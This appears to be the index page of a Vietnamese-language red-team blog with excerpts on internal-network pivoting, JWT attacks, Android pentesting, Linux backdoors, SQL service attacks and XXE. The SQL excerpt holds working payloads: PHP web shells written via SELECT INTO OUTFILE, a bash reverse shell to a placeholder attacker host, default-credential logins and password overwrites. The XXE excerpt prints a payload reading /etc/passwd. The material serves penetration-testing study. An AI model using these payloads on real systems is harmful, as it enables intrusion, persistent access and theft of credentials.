https://raw.githubusercontent.com/tranquac/Blog_Image/master/avatar/avatar.jpg

Hacker / Red Teamer / Security Enthusiast

Tunneling, Pivoting to Attack Internal Network

Intro Có rất nhiều bài viêt,blog nói về việc tấn công,xâm nhập mạng nội bộ trên Internet, nhưng hầu hết trong số chúng tập trung vào việc sử dụng các công cụ, các nguyên tắc, tình huống ít được đề cập, giải thích nhiều. Bài viết này tôi sẽ thảo luận về nguyên tắc tấn công mạng nội bộ đa dạng, thiết kế linh hoạt sơ đồ tấn công mạng nội bộ tương ứng theo các tình huống của mạng nội bộ khác nhau.

JWT Attack

What is JWT Tên đầy đủ của JWT là Json Web Token. Nó tuân theo định dạng JSON và mã hóa thông tin người dùng vào token. Máy chủ không lưu trữ bất kỳ thông tin người dùng nào, chỉ thông tin chính và xác minh token bằng cách sử dụng một thuật toán mã hóa cụ thể và xác minh danh tính của người dùng thông qua token. Xác thực dựa trên token có thể thay thế phương pháp xác thực cookie + session truyền thống.

Android Pentest Note

Concept Decompile and compile Using Adb and Frida interact Android Concept Structure AndroidManifest file contains the application’s structure Res folder contains all the resources that the application needs to run , including user interface layout, icons, audio, etc. The most interesting files for us are the classes.dex files because they are the compiled java files. The .dex extension stands for Dalvik EXecutable. So we need to decompile these dex files to get the java classes.

Linux Backdoors

Trong thực tế khi có quyền truy cập vào mục tiêu(SSH, VNC, interactive shell …) thì việc để lại backdoor là một phần quan trọng để duy trì quyền truy cập vào hệ thống mục tiêu. Do đó, việc học một số kỹ thuật backdoor là điều cần thiết, không chỉ đối với những kẻ tấn công mà cả những người phòng thủ. Sau đây chúng ta sẽ tìm hiểu một số kĩ thuật backdoor thông dụng.

SQL

General MySQL-3306 Nmap nmap -Pn -sV -p 3306 --script mysql* TARGETIP Access Remotely: mysql-host=TARGETIP-uroot-pmysql-uroot-ppassword-e'show databases;'mysql-uroot-ppasswordDBNAME-e'select * from TABLENAME;'Access Locally: mysql-uroot-pmysql>useDBNAME;mysql>showtables;Command Backdoor example: SELECT"<?php system($_GET['cmd']); ?>"intooutfile"/var/www/html/backdoor.php";SELECT"<?php exec(""/bin/bash -c 'bash -i >&/dev/tcp/ATTACKERIP/PORT 0>&1'""); ?> "intooutfile"/tmp/shell.php";Update a field example: (i.e. change a password): updateTABLENAMEsetPASSWORDFIELD='NEWHASH'whereUSERNAMEFIELD='USERNAME';PHPMyAdmin Default User: root Default Password: (none) Create a new table, then go to the SQL tab SELECT"<?php system($_GET['cmd']); ?>"intooutfile"C:\\xampp\\htdocs\\command.php";`http://TARGTEIP/phpmyadmin/command.php?cmd=ipconfigMSSQL-1433 Default username : sa Nmap nmap -sV -Pn -p 1433 --script ms-sql-brute --script-args userdb=users.

XXE

What is XXE XXE = XML eXternal Entities XXE can occur when XML documents get parsed. We traditionally think of XXE vulnerabilities as uploading an XML file that includes an external entity, an example of this would be: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo> We might be able to upload this file if we save it as .xml into an application that process XML files but what some people don’t know is that some other file types consist of XML files.